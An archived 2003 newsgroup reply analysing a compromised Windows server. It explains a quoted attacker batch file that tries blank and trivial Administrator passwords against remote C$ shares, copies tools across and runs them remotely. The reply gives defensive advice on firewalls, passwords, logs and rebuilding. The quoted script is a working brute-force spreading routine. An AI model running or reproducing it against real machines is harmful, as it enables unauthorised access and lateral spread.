Re: Someone hacked one of my servers
From: Karl Levinson [x y] mvp (levinson_k@despammed.com)
Date: 02/17/03
- Previous message: Karl Levinson [x y] mvp: "Re: remote shutdown"
- In reply to: Joe Kinsella: "Someone hacked one of my servers"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Karl Levinson [x y] mvp" <levinson_k@despammed.com> Date: Sun, 16 Feb 2003 19:38:33 -0500
The first few commands are trying to open a C: drive by logging in with the
account Admin or Administrator with some very simple passwords. If one of
these worked, you really really need a better password on all your accounts,
especially administrator... and a firewall that blocks windows networking
[netbios over TCP/IP, e.g. TCP and UDP 135 - 139 and 445] BOTH directions,
not just outbound. The %1 command implies this is a batch file where the
server name or IP address is supplied when the batch file is called, at the
command line or by another batch file, e.g. FILENAME.BAT servername
If you found this file on your computer, this person probably had already
hacked a way to remotely run commands on your server which may or may not be
related to this batch file. I'm also guessing they used the TFTP.EXE or
FTP.EXE commands to download other files such as iserver.bat and ntadmin.exe
and ntcmd and skill.vxd to your C:\drivers\ folder [which they probably
created as well]. You can see file copies in the second part of this log.
I'm guessing ntcmd.exe in the third part is something like CUSRMGR.EXE from
the Windows Resource Kit. It looks like they attempted to create some
accounts named Admin or Administrator to allow future access. Note that
while these accounts may have been created on your computer, these commands
are probably trying to create the accounts on another computer, maybe on
your network, maybe not. I think you've got some REAL problems. There's no
way to know what else they did to this system.
Frequently this type of hack might come in through IIS web services, so
check your IIS web logs if you have logging enabled. Otherwise, check your
firewall logs [if you had a firewall.] Otherwise, you probably don't have
any other logs that show what happened or who to try to prosecute. If
you're a business, you might try calling the authorities [police or local
FBI office in the US, though don't expect anything to happen unless you're a
business with provable financial loss].
You're doing the right thing in analyzing the system to try to prevent
making the same mistake again. I would seriously think about formatting and
reinstalling everything after your investigation is over.
Firewalls and antivirus can be had for free [example www.sygate.com free
firewall and www.grisoft.com for antivirus]. So there's no excuse.
Here are some things you should do:
http://securityadmin.info/faq.htm#hacked [looking for more clues to how you
were hacked]
http://securityadmin.info/faq.htm#iislogs2
http://securityadmin.info/faq.htm#iislogs
http://securityadmin.info/faq.htm#re-secure
http://securityadmin.info/faq.htm#harden [how to harden your computer
against this]
http://securityadmin.info/faq.htm#firewalls
Hope this helps. Let us know if you find anything interesting or have any
questions.
"Joe Kinsella" <joek@tarragonsoftware.com> wrote in message
news:#szqwCY1CHA.1712@TK2MSFTNGP10...
> After realizing my system was hacked, I took it offline and started to
look
> at what happened. I found a script called share.bat that reads as listed
> below: Does anyone have any idea what this might be doing?
>
> net use \\%1\C$ "" "/user:Administrator"
> net use \\%1\C$ "administrator" "/user:Administrator"
> net use \\%1\C$ "admin" "/user:Administrator"
> net use \\%1\C$ "" "/user:Admin"
> net use \\%1\C$ "admin" "/user:Admin"
> net use \\%1\C$ "administrator" "/user:Admin"
> md \\%1\C$\Drivers
> copy iserver.bat \\%1\C$\Drivers
> copy ntadmin.exe \\%1\C$\Drivers
> ntcmd \\%1 -u:Administrator -p: < skill.vxd
> ntcmd \\%1 -u:Administrator -p:administrator < skill.vxd
> ntcmd \\%1 -u:Administrator -p:admin < skill.vxd
> ntcmd \\%1 -u:Admin -p: < skill.vxd
> ntcmd \\%1 -u:Admin -p:admin < skill.vxd
> ntcmd \\%1 -u:Admin -p:administrator < skill.vxd
> net use \\%1\C$ /del
>
>
--- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.449 / Virus Database: 251 - Release Date: 1/27/2003
- Next message: vagabond: "Re: Need advice wrt. unsoliciated msg and files"
- Previous message: Karl Levinson [x y] mvp: "Re: remote shutdown"
- In reply to: Joe Kinsella: "Someone hacked one of my servers"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
